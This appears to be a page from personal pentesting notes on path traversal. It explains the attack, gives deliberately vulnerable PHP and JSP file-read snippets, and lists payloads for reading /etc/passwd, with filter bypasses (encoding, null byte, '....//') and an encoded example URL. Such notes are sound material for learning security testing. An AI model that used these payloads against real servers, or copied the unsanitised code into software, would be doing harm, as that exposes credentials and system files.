Pentesting and Red Teaming Notes
  • 🖥️Pentesting and Red Teaming Cheatsheet
  • Web Application Pentesting(BlackBox)
    • SQL Injection
    • Blind SQL Injection
    • Path Traversal
    • Attacking Authentication
    • Race Conditions
    • Business Logic Vulnerabilities
    • Command Injections
    • Information disclosure
    • Access Controls
    • File upload Attacks
    • XXE
    • Server Side Request Forgery
    • Api Testing
    • noSQL
    • DOM based vulnerabilities
    • Cross Site scripting
  • Infrastructure Pentesting
    • Windows Privilege Escalation
    • Attacking Active Directory
    • File Transfers and Download
    • Pivoting(Tunneling and Port Forwarding)
    • Linux Privilege Escalation
    • Stealing NTLM hashes
    • Tricks and Tips
  • Active Directory Pentesting
    • powershell theory
    • Methodology
    • domain enumeration
    • File Transfer
    • PowerShell ADModule
    • Local Privilege Escalation
    • PowerView Commands
    • ACLs Descriptions
    • ACLs Abuse
    • ACL
    • Trusts
    • User Hunting
    • group policy
    • Mimikatz
    • BloodHound
    • LateralMovement
    • Kerberoasting
    • defense bypasses
    • Set-SPN
    • ASREProasting
    • Unconstrained Delegation
    • Constrained Delegation
    • Resource Based Constrained Delegation
    • AD CS
    • Persistance
    • Priv Esc Trusts Inside Forest
    • MSSQL Servers
    • Priv Esc Trusts Across Forest
    • Tips And Tricks
    • Service Tickets and Abuses
  • Reconnaissance
    • Web Application Reconnaissance
    • External Reconnaissance
Powered by GitBook
On this page
  • Vulnerable code snippets
  • PHP
  • JSP
  • Techniques
  1. Web Application Pentesting(BlackBox)

Path Traversal

Path traversl or directory traversal is an attack which allows an attacker to read aribitary files on the server that is running an application. Path traversal allows an attacker to read:

  • Sensative operating system files

  • Application code and data

  • Credentials for backend systems

Vulnerable code snippets

PHP

$file = $_GET['file'];
if(file_exists('/var/www/html/'.$file)) {
		readfile('/var/www/html/'. $file);
	}

JSP

String file = request.getParameter("file");
FileInputStream f = new FileInputStream("/var/www/"+file);
byte[]data = new byte[f.available()];
f.read(data);
f.close();
response.getOutputStream().write(data);

Techniques

  • Direct: /etc/passwd

  • Traversing: ../../../../../etc/passwd

  • If ../ is escaped: ....//....//....//....//

  • URL encoding: %2e%2e%2f

  • Double url encoding: %252e%252e%252f

  • Start path is validated and must start with expected base folder: /var/www/html/images/../../../../etc/passwd

  • File extension validated? use null byte: ../../../../../etc/passwd%00.png

Note: In case of node js applications may instances of traversal can occur directly by appending traversal sequence to some directory eg:

https://example.com/file/static/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64

PreviousBlind SQL InjectionNextAttacking Authentication

Last updated 10 months ago